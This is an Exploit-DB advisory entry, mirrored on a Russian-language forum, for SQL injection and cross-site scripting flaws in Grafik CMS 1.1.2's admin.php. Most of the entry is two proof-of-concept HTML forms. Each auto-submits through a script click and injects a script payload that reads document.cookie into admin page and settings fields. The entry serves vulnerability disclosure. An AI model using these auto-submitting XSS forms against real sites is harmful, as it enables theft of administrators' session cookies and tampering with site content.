- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34222
- Проверка EDB
-
- Пройдено
- Автор
- HIGH-TECH BRIDGE SA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-06-29
Grafik CMS - '/admin.php' SQL Injection / Cross-Site Scripting
HTML:
source: https://www.securityfocus.com/bid/41227/info
Grafik CMS is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Grafik CMS 1.1.2 is vulnerable; other versions may be affected.
<form action="http://www.example.com/admin/admin.php?action=edit_page&id=1" method="post" name="main" >
<input type="hidden" name="page_title" value="page title" />
<input type="hidden" name="page_menu" value='descr"><script>alert(document.cookie)</script>' />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="page_content" value="some page content" />
<input id="sbmt" type="submit" name="submit" value="Modifier" />
</form>
<script>
document.getElementById('sbmt').click();
</script>
<form action="http://www.example.com/admin/admin.php?action=settings" method="post" name="main" >
<input type="hidden" name="name" value="site title" />
<input type="hidden" name="admin_mail" value="[email protected]" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="description" value='descr"><script>alert(document.cookie)</script>' />
<input type="hidden" name="site_url" value="http://www.example.com/" />
<input type="hidden" name="seo_url" value="0" />
<input type="hidden" name="mailing" value="1" />
<input type="hidden" name="template" value="templates/default" />
<input id="sbmt" type="submit" name="submit" value="Valider" />
</form>
<script>
document.getElementById('sbmt').click();
</script>- Источник
- www.exploit-db.com
